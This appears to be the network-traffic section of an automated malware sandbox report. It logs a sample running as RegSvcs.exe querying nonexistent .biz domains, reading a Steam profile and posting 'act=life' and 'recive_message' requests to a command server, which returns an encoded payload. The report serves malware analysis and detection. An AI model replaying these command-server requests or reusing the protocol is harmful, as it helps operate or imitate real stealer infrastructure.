                                                                              Jan 14, 2025 18:01:23.963255882 CET44349782188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:23.963323116 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:23.963587046 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:23.963601112 CET44349782188.114.97.3192.168.2.10
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 14, 2025 18:01:09.868068933 CET5419653192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.876349926 CET53541961.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.877880096 CET6482853192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.886950016 CET53648281.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.890770912 CET5763753192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.900130987 CET53576371.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.903270960 CET5733353192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.911900043 CET53573331.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.914056063 CET5425353192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.923238039 CET53542531.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.924696922 CET5738953192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.933404922 CET53573891.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.936321974 CET6295553192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.945915937 CET53629551.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.947254896 CET6401053192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.958478928 CET53640101.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:09.959949970 CET6100753192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:09.966897964 CET53610071.1.1.1192.168.2.10
                                                                              Jan 14, 2025 18:01:11.898705006 CET5789853192.168.2.101.1.1.1
                                                                              Jan 14, 2025 18:01:11.908072948 CET53578981.1.1.1192.168.2.10
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 14, 2025 18:01:09.868068933 CET192.168.2.101.1.1.10x8b67Standard query (0)littlenotii.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.877880096 CET192.168.2.101.1.1.10x402cStandard query (0)fraggielek.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.890770912 CET192.168.2.101.1.1.10x115cStandard query (0)grandiouseziu.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.903270960 CET192.168.2.101.1.1.10x61bStandard query (0)marketlumpe.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.914056063 CET192.168.2.101.1.1.10x41afStandard query (0)nuttyshopr.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.924696922 CET192.168.2.101.1.1.10x4527Standard query (0)punishzement.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.936321974 CET192.168.2.101.1.1.10x1038Standard query (0)spookycappy.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.947254896 CET192.168.2.101.1.1.10x50b1Standard query (0)truculengisau.bizA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.959949970 CET192.168.2.101.1.1.10x7537Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:11.898705006 CET192.168.2.101.1.1.10xb087Standard query (0)aleksandr-block.comA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 14, 2025 18:01:09.876349926 CET1.1.1.1192.168.2.100x8b67Name error (3)littlenotii.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.886950016 CET1.1.1.1192.168.2.100x402cName error (3)fraggielek.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.900130987 CET1.1.1.1192.168.2.100x115cName error (3)grandiouseziu.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.911900043 CET1.1.1.1192.168.2.100x61bName error (3)marketlumpe.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.923238039 CET1.1.1.1192.168.2.100x41afName error (3)nuttyshopr.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.933404922 CET1.1.1.1192.168.2.100x4527Name error (3)punishzement.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.945915937 CET1.1.1.1192.168.2.100x1038Name error (3)spookycappy.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.958478928 CET1.1.1.1192.168.2.100x50b1Name error (3)truculengisau.biznonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:09.966897964 CET1.1.1.1192.168.2.100x7537No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:11.908072948 CET1.1.1.1192.168.2.100xb087No error (0)aleksandr-block.com188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 18:01:11.908072948 CET1.1.1.1192.168.2.100xb087No error (0)aleksandr-block.com188.114.96.3A (IP address)IN (0x0001)false
                                                                              • steamcommunity.com
                                                                              • aleksandr-block.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1049704104.102.49.2544437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Host: steamcommunity.com
                                                                              2025-01-14 17:01:11 UTC1905INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              Cache-Control: no-cache
                                                                              Date: Tue, 14 Jan 2025 17:01:11 GMT
                                                                              Content-Length: 35141
                                                                              Connection: close
                                                                              Set-Cookie: sessionid=a2a17d00173fb6b2b7593477; Path=/; Secure; SameSite=None
                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                              2025-01-14 17:01:11 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                              2025-01-14 17:01:11 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                              Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                              2025-01-14 17:01:11 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                              Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
                                                                              2025-01-14 17:01:11 UTC510INData Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
                                                                              Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1049711188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:12 UTC266OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2025-01-14 17:01:13 UTC1125INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aef9ig253fc64iq2g8eg5nlpk7; expires=Sat, 10 May 2025 10:47:51 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLoMti%2BW8f%2FqRo8zN0x0xqdB18hIIm2k%2BOx3LA5gMyWqTTHFFex8CLiAhxRmSEGHRaDjlUVSs2uqBdbN3H0f06UzdxMltug7X7NFM1ZvZLfbe14GlTMo4CTVhxpKI2wge3CyRpln"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f2fc8de784358-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1653&rtt_var=644&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=910&delivery_rate=1766485&cwnd=206&unsent_bytes=0&cid=6141d28936c49d86&ts=763&x=0"
                                                                              2025-01-14 17:01:13 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2025-01-14 17:01:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1049717188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:13 UTC267OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 47
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:13 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 50 49 53 59 41 26 6a 3d
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=DUkgLv--PISYA&j=
                                                                              2025-01-14 17:01:14 UTC1128INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c5m6jjqq40nmcetq226c43ntcj; expires=Sat, 10 May 2025 10:47:52 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7U%2FXkZTRmj6yOIx99Ot03sWZCnbxlT4cbN%2B%2F%2F1v9l2k0iCVCpM5lT%2FstKbVvphYINmzMRTxFY8NbBVdWtIqrR86Koqr1oixTbG2OdEVW5V7aTeiPSm45XKnWt9NBIwTlVmS9Exjh"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f2fd08aadc427-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1515&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=950&delivery_rate=1896103&cwnd=32&unsent_bytes=0&cid=4b603b8f4037887e&ts=497&x=0"
                                                                              2025-01-14 17:01:14 UTC241INData Raw: 34 39 39 34 0d 0a 6f 62 73 48 51 6b 44 30 6e 65 58 45 6b 70 6b 48 53 38 37 48 70 5a 45 4a 58 62 46 38 33 6d 32 56 59 55 62 66 48 4d 45 51 2b 59 4c 61 6d 58 46 67 65 73 43 78 78 37 66 33 75 7a 30 2f 76 4c 4c 41 76 53 73 38 31 56 37 6b 43 2f 51 4e 4e 62 6f 77 34 32 61 55 6f 4a 76 64 5a 69 34 7a 6b 62 48 48 6f 65 71 37 50 52 43 31 35 63 44 2f 4b 32 65 54 47 62 51 50 39 41 30 6b 76 6e 65 75 59 4a 58 68 79 64 64 67 4b 69 57 58 2b 59 53 6f 2f 2f 78 69 4c 71 2b 74 79 2f 68 6b 4e 64 78 65 38 6b 2f 77 47 32 54 6c 50 6f 78 31 6a 65 50 73 32 6e 51 70 59 6f 6d 78 6e 75 62 33 39 79 56 78 37 4b 62 41 38 32 55 37 31 52 65 32 42 66 30 46 4a 62 74 32 73 58 6d 66 36 73 6e 5a 59 79 73 76 6e 75 32 4a 6f 76 6a 33 5a 43 53 76 35 59 6d
                                                                              Data Ascii: 4994obsHQkD0neXEkpkHS87HpZEJXbF83m2VYUbfHMEQ+YLamXFgesCxx7f3uz0/vLLAvSs81V7kC/QNNbow42aUoJvdZi4zkbHHoeq7PRC15cD/K2eTGbQP9A0kvneuYJXhyddgKiWX+YSo//xiLq+ty/hkNdxe8k/wG2TlPox1jePs2nQpYomxnub39yVx7KbA82U71Re2Bf0FJbt2sXmf6snZYysvnu2Jovj3ZCSv5Ym
                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 7a 62 43 65 54 52 76 78 63 78 51 41 31 72 47 75 75 59 70 32 67 33 4a 64 38 59 43 57 61 76 39 2f 6d 2b 50 64 72 4c 4b 2b 71 77 50 4a 72 4c 64 77 65 76 77 66 2f 42 79 36 79 63 61 78 38 6b 65 66 4c 30 47 49 76 4a 5a 37 35 69 4b 57 77 74 53 55 75 74 4f 57 66 73 30 73 76 30 42 32 6f 41 75 5a 44 4f 2f 4e 6e 34 33 57 58 6f 4a 75 5a 59 79 34 6a 6d 2f 2b 56 72 76 76 77 59 44 75 6e 72 4d 72 2b 61 7a 4c 5a 45 62 38 50 38 41 6b 75 73 6e 53 6e 66 35 62 6d 77 39 6b 6c 62 6d 4b 52 35 38 66 2b 73 4e 68 67 4f 61 75 70 30 62 46 52 66 38 78 51 70 55 2f 77 44 32 54 6c 50 71 74 33 6d 4f 50 49 31 6d 59 6f 4b 59 54 2f 6c 61 44 39 2f 6e 63 76 71 61 76 4e 38 48 6b 31 33 52 69 2f 42 76 77 4b 49 62 70 36 34 7a 7a 62 35 39 75 5a 50 57 41 44 6d 2f 53 4c 72 4f 66 37 4a 54 62 69 76 49
                                                                              Data Ascii: zbCeTRvxcxQA1rGuuYp2g3Jd8YCWav9/m+PdrLK+qwPJrLdwevwf/By6ycax8kefL0GIvJZ75iKWwtSUutOWfs0sv0B2oAuZDO/Nn43WXoJuZYy4jm/+VrvvwYDunrMr+azLZEb8P8AkusnSnf5bmw9klbmKR58f+sNhgOaup0bFRf8xQpU/wD2TlPqt3mOPI1mYoKYT/laD9/ncvqavN8Hk13Ri/BvwKIbp64zzb59uZPWADm/SLrOf7JTbivI
                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 32 52 69 7a 41 76 74 44 61 76 31 35 75 7a 4c 44 6f 4f 6e 61 63 53 4d 6f 31 4d 71 45 71 50 37 38 63 32 6d 7a 36 39 36 7a 62 44 4f 54 52 76 77 43 39 67 73 69 72 33 47 75 63 5a 58 75 7a 4e 78 71 4b 43 4b 57 38 6f 4b 69 2b 2f 42 6d 4a 4b 69 33 7a 66 4e 6a 4f 74 49 55 74 6b 2b 35 51 79 4f 6c 50 76 73 79 71 76 66 49 6d 31 41 6a 4c 4a 6a 34 6b 65 62 76 74 58 78 70 71 36 6d 48 71 79 73 79 32 78 75 35 41 50 59 4a 4b 72 68 30 72 33 71 56 34 39 48 57 59 53 41 75 6e 76 57 4b 71 50 54 7a 62 43 4b 6e 6f 38 66 79 59 58 2b 64 58 72 73 58 74 31 74 6b 69 58 6d 76 66 35 53 69 39 74 70 72 4c 69 57 41 76 35 6a 6f 36 62 74 69 4a 65 7a 39 68 2f 39 69 50 39 67 55 75 41 2f 77 44 69 47 2b 65 61 42 2f 6e 4f 72 4e 33 6d 45 73 4b 35 76 35 68 36 48 30 2f 6e 63 73 70 61 6e 4c 73 79 56
                                                                              Data Ascii: 2RizAvtDav15uzLDoOnacSMo1MqEqP78c2mz696zbDOTRvwC9gsir3GucZXuzNxqKCKW8oKi+/BmJKi3zfNjOtIUtk+5QyOlPvsyqvfIm1AjLJj4kebvtXxpq6mHqysy2xu5APYJKrh0r3qV49HWYSAunvWKqPTzbCKno8fyYX+dXrsXt1tkiXmvf5Si9tprLiWAv5jo6btiJez9h/9iP9gUuA/wDiG+eaB/nOrN3mEsK5v5h6H0/ncspanLsyV
                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 30 48 75 51 79 4f 78 50 76 73 79 6b 75 6e 52 31 32 73 70 4c 35 44 33 67 4b 6a 39 38 47 4d 69 71 36 4c 42 2f 6d 4d 79 31 68 32 39 43 2f 30 52 4a 37 5a 30 72 6e 6a 62 72 6f 50 65 66 57 42 36 31 74 69 4c 6a 2b 44 67 64 7a 2f 73 75 6f 6e 71 4b 7a 6a 66 58 75 52 50 39 41 77 74 73 6e 61 72 66 5a 54 6b 7a 64 39 6a 4c 53 65 5a 39 5a 57 75 2f 76 5a 75 4a 71 65 33 78 2f 35 76 4d 39 63 57 74 77 57 33 54 57 53 36 5a 75 4d 71 32 39 58 4f 31 6d 55 6a 4e 4e 62 67 79 62 2b 77 2f 47 6c 70 39 4f 58 4c 2f 57 73 77 33 78 4b 33 42 2f 59 50 4b 72 70 37 71 6e 71 54 38 73 4c 64 62 53 45 73 6d 66 36 44 6f 2f 58 2f 59 69 32 71 71 6f 65 39 4b 7a 6a 4c 58 75 52 50 32 43 51 52 2f 31 2b 5a 4d 6f 53 75 32 70 6c 69 4c 47 4c 4f 76 34 75 6c 2f 50 4e 71 4c 36 57 70 7a 66 70 67 4d 39 67 61
                                                                              Data Ascii: 0HuQyOxPvsykunR12spL5D3gKj98GMiq6LB/mMy1h29C/0RJ7Z0rnjbroPefWB61tiLj+Dgdz/suonqKzjfXuRP9AwtsnarfZTkzd9jLSeZ9ZWu/vZuJqe3x/5vM9cWtwW3TWS6ZuMq29XO1mUjNNbgyb+w/Glp9OXL/Wsw3xK3B/YPKrp7qnqT8sLdbSEsmf6Do/X/Yi2qqoe9KzjLXuRP2CQR/1+ZMoSu2pliLGLOv4ul/PNqL6WpzfpgM9ga
                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 59 72 76 48 2b 6c 59 4a 7a 70 30 64 64 6f 4c 79 71 65 39 6f 61 69 39 66 5a 6a 4a 61 61 6b 77 50 31 6c 4e 35 4e 51 2f 41 6a 76 51 33 7a 39 58 37 4e 70 69 66 62 4f 2b 47 67 76 59 6f 6d 78 6e 75 62 33 39 79 56 78 37 4b 7a 56 39 32 59 74 32 68 6d 79 41 50 51 52 4a 62 42 31 73 58 57 55 35 4d 54 56 59 79 38 6b 6c 2f 71 4e 71 76 66 2b 62 69 61 67 35 59 6d 7a 62 43 65 54 52 76 77 68 2f 42 41 7a 76 6e 43 6f 5a 49 43 67 33 4a 64 38 59 43 57 61 76 39 2f 6d 38 2f 42 75 4c 61 79 70 78 2f 64 6d 50 38 45 52 75 77 6a 2b 43 44 61 33 65 61 52 35 6b 2b 76 4d 33 33 63 73 4c 49 54 36 6c 62 53 77 74 53 55 75 74 4f 57 66 73 31 30 34 77 77 36 2f 54 63 59 56 4a 36 74 31 72 6e 37 62 2f 34 33 41 4a 53 63 75 31 71 66 48 6f 50 2f 79 5a 69 61 74 72 4d 76 2b 62 6a 62 57 48 37 6f 4c 2f
                                                                              Data Ascii: YrvH+lYJzp0ddoLyqe9oai9fZjJaakwP1lN5NQ/AjvQ3z9X7NpifbO+GgvYomxnub39yVx7KzV92Yt2hmyAPQRJbB1sXWU5MTVYy8kl/qNqvf+biag5YmzbCeTRvwh/BAzvnCoZICg3Jd8YCWav9/m8/BuLaypx/dmP8ERuwj+CDa3eaR5k+vM33csLIT6lbSwtSUutOWfs104ww6/TcYVJ6t1rn7b/43AJScu1qfHoP/yZiatrMv+bjbWH7oL/
                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 6c 34 32 33 56 2b 59 50 65 61 57 42 36 31 76 79 41 70 66 48 78 62 43 57 6a 6f 73 50 68 59 54 6a 42 48 37 30 45 2b 67 38 6b 73 48 4f 70 63 35 4c 74 7a 39 52 69 4a 79 32 54 76 38 6e 6d 39 2b 4d 6c 63 65 79 45 79 76 68 6e 5a 49 6c 65 6f 30 48 75 51 79 4f 78 50 76 73 79 6d 2b 72 47 30 32 67 6a 4c 5a 58 74 68 71 44 69 2b 32 67 6a 76 71 2f 4d 39 6d 59 79 33 68 32 36 43 66 77 50 4e 72 52 2b 6f 48 6e 62 72 6f 50 65 66 57 42 36 31 74 79 51 73 50 72 38 61 54 2b 6e 70 4d 54 6c 5a 69 2b 54 55 50 77 65 38 42 4a 6b 35 57 69 7a 5a 5a 7a 2f 6a 63 41 6c 4a 79 37 57 70 38 65 67 2b 66 31 69 4c 36 4b 33 77 76 56 6b 4d 4e 6f 58 75 41 66 30 41 79 43 35 65 61 5a 78 6c 2b 76 45 32 6d 6f 6b 4b 35 6a 32 69 4f 61 2b 75 32 49 78 37 50 32 48 30 6e 41 38 33 78 50 38 45 4c 6b 61 5a 4c
                                                                              Data Ascii: l423V+YPeaWB61vyApfHxbCWjosPhYTjBH70E+g8ksHOpc5Ltz9RiJy2Tv8nm9+MlceyEyvhnZIleo0HuQyOxPvsym+rG02gjLZXthqDi+2gjvq/M9mYy3h26CfwPNrR+oHnbroPefWB61tyQsPr8aT+npMTlZi+TUPwe8BJk5WizZZz/jcAlJy7Wp8eg+f1iL6K3wvVkMNoXuAf0AyC5eaZxl+vE2mokK5j2iOa+u2Ix7P2H0nA83xP8ELkaZL
